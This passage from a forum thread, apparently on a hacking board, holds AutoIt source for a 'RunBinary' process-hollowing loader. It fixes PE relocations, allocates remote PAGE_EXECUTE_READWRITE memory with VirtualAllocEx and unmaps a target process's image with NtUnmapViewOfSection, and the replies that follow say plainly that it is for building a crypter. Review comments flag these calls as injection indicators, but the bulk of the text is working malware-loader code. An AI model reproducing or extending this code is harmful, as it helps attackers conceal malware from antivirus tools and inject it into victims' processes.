        ; $pAddressNew - address the image actually resides at
        ; $pAddressOld - address the image was linked for
        ; $fImageX64   - True for a 64-bit image (DIR64 entries), False for 32-bit (HIGHLOW entries)
        ; Returns 1 unconditionally; the function has no failure path.
        ; NOTE(review): patching happens through DllStructCreate("ptr", address), i.e. in the
        ; calling process's own address space, so $pModule must be mapped locally.
        Local $iDelta = $pAddressNew - $pAddressOld ; dislocation value
        Local $iSize = DllStructGetSize($tData) ; size of data
        Local $pData = DllStructGetPtr($tData) ; address of the data structure
        Local $tIMAGE_BASE_RELOCATION, $iRelativeMove ; NOTE(review): $iRelativeMove is never initialised; the loop appears to rely on AutoIt treating the empty value as 0 in the comparison below - confirm
        Local $iVirtualAddress, $iSizeofBlock, $iNumberOfEntries
        Local $tEnries, $iData, $tAddress
        Local $iFlag = 3 + 7 * $fImageX64 ; IMAGE_REL_BASED_HIGHLOW = 3 or IMAGE_REL_BASED_DIR64 = 10
        While $iRelativeMove < $iSize ; for all data available
            ; Each block begins with an 8-byte header: page RVA and total block size (header included)
            $tIMAGE_BASE_RELOCATION = DllStructCreate("dword VirtualAddress; dword SizeOfBlock", $pData + $iRelativeMove)
            $iVirtualAddress = DllStructGetData($tIMAGE_BASE_RELOCATION, "VirtualAddress")
            $iSizeofBlock = DllStructGetData($tIMAGE_BASE_RELOCATION, "SizeOfBlock")
            $iNumberOfEntries = ($iSizeofBlock - 8) / 2 ; the entries are WORDs that follow the 8-byte header
            $tEnries = DllStructCreate("word[" & $iNumberOfEntries & "]", DllStructGetPtr($tIMAGE_BASE_RELOCATION) + 8)
            ; Go through all entries
            For $i = 1 To $iNumberOfEntries
                $iData = DllStructGetData($tEnries, 1, $i)
                If BitShift($iData, 12) = $iFlag Then ; check type (upper 4 bits of the entry); other types are skipped
                    $tAddress = DllStructCreate("ptr", $pModule + $iVirtualAddress + BitAND($iData, 0xFFF)) ; the rest of $iData is offset
                    DllStructSetData($tAddress, 1, DllStructGetData($tAddress, 1) + $iDelta) ; this is what's this all about
                EndIf
            Next
            $iRelativeMove += $iSizeofBlock ; advance to the next block
        WEnd
        Return 1 ; all OK!
    EndFunc   ;==>_RunBinary_FixReloc
    
    
    Func _RunBinary_AllocateExeSpaceAtAddress($hProcess, $pAddress, $iSize)
        ; Allocates $iSize bytes of executable, writable memory at a fixed address in another process.
        ; $hProcess - handle to the target process
        ; $pAddress - requested base address
        ; $iSize    - number of bytes to allocate
        ; Returns the base address on success; on failure returns 0 with @error = 1.
        ; NOTE(review): a cross-process VirtualAllocEx with PAGE_EXECUTE_READWRITE (64) is one of
        ; the strongest generic indicators of code injection; memory-allocation telemetry that
        ; keys on remote RWX allocations surfaces both calls below.
        ; Allocate
        Local $aCall = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", _
                "handle", $hProcess, _
                "ptr", $pAddress, _
                "dword_ptr", $iSize, _
                "dword", 0x1000, _ ; MEM_COMMIT
                "dword", 64) ; PAGE_EXECUTE_READWRITE
        ; Check for errors or failure
        If @error Or Not $aCall[0] Then
            ; Try differently
            ; Commit-only can only succeed where the range is already reserved, so the
            ; fallback reserves and commits in one call.
            $aCall = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", _
                    "handle", $hProcess, _
                    "ptr", $pAddress, _
                    "dword_ptr", $iSize, _
                    "dword", 0x3000, _ ; MEM_COMMIT|MEM_RESERVE
                    "dword", 64) ; PAGE_EXECUTE_READWRITE
            ; Check for errors or failure
            If @error Or Not $aCall[0] Then Return SetError(1, 0, 0) ; Unable to allocate
        EndIf
        Return $aCall[0]
    EndFunc   ;==>_RunBinary_AllocateExeSpaceAtAddress
    
    
    Func _RunBinary_AllocateExeSpace($hProcess, $iSize)
        ; Allocates $iSize bytes of executable, writable memory in another process, letting the
        ; system choose the address (lpAddress = 0).
        ; $hProcess - handle to the target process
        ; $iSize    - number of bytes to allocate
        ; Returns the base address on success; on failure returns 0 with @error = 1.
        ; NOTE(review): same detection surface as _RunBinary_AllocateExeSpaceAtAddress - a remote
        ; PAGE_EXECUTE_READWRITE allocation is a classic injection indicator.
        ; Allocate space
        Local $aCall = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", _
                "handle", $hProcess, _
                "ptr", 0, _
                "dword_ptr", $iSize, _
                "dword", 0x3000, _ ; MEM_COMMIT|MEM_RESERVE
                "dword", 64) ; PAGE_EXECUTE_READWRITE
        ; Check for errors or failure
        If @error Or Not $aCall[0] Then Return SetError(1, 0, 0) ; Unable to allocate
        Return $aCall[0]
    EndFunc   ;==>_RunBinary_AllocateExeSpace
    
    
    Func _RunBinary_UnmapViewOfSection($hProcess, $pAddress)
        ; Unmaps the section mapped at $pAddress in another process via the native
        ; NtUnmapViewOfSection call.
        ; $hProcess - handle to the target process (passed as "ptr" here, unlike the "handle"
        ;             type used by the sibling helpers)
        ; $pAddress - base address of the view to unmap
        ; Returns 1, or 0 with @error = 1 when the DllCall itself fails.
        ; NOTE(review): the NTSTATUS returned by NtUnmapViewOfSection is discarded; only DllCall's
        ; @error is inspected, so an unsuccessful unmap is not reported to the caller.
        ; NOTE(review): unmapping the original image of a suspended child process is the hallmark
        ; step of process hollowing; this call from a non-loader process is a high-value detection point.
        DllCall("ntdll.dll", "int", "NtUnmapViewOfSection", _
                "ptr", $hProcess, _
                "ptr", $pAddress)
        ; Check for errors only
        If @error Then Return SetError(1, 0, 0) ; Failure
        Return 1
    EndFunc   ;==>_RunBinary_UnmapViewOfSection
    
    
    Func _RunBinary_IsWow64Process($hProcess)
        ; Reports whether the given process runs under WOW64 (a 32-bit process on 64-bit Windows).
        ; $hProcess - handle to the process to query
        ; Returns the BOOL written to the out parameter (element 2 of the DllCall result):
        ; non-zero if WOW64, 0 otherwise. On failure returns 0 with @error = 1, so a
        ; "not WOW64" answer and a failed call are distinguishable only through @error.
        Local $aCall = DllCall("kernel32.dll", "bool", "IsWow64Process", _
                "handle", $hProcess, _
                "bool*", 0)
        ; Check for errors or failure
        If @error Or Not $aCall[0] Then Return SetError(1, 0, 0) ; Failure
        Return $aCall[2]
    EndFunc   ;==>_RunBinary_IsWow64Process
    
     
  2. 1stetcgoldmedal
  3. PirateTM
    На autoit тестил?
     
  4. 1stetcgoldmedal
    [QUOTE="PirateTM, post: 8152, member: 3182"]На autoit тестил?[/QUOTE]
    Yeah
     
  5. PirateTM
    I'm starting to learn AutoIt, and it is amazing that it is possible to make a crypter with it. So its main functionality is supporting GUI applications on Windows.
     
  6. 1stetcgoldmedal
    What U R Skype or Jabber?
     
  7. PirateTM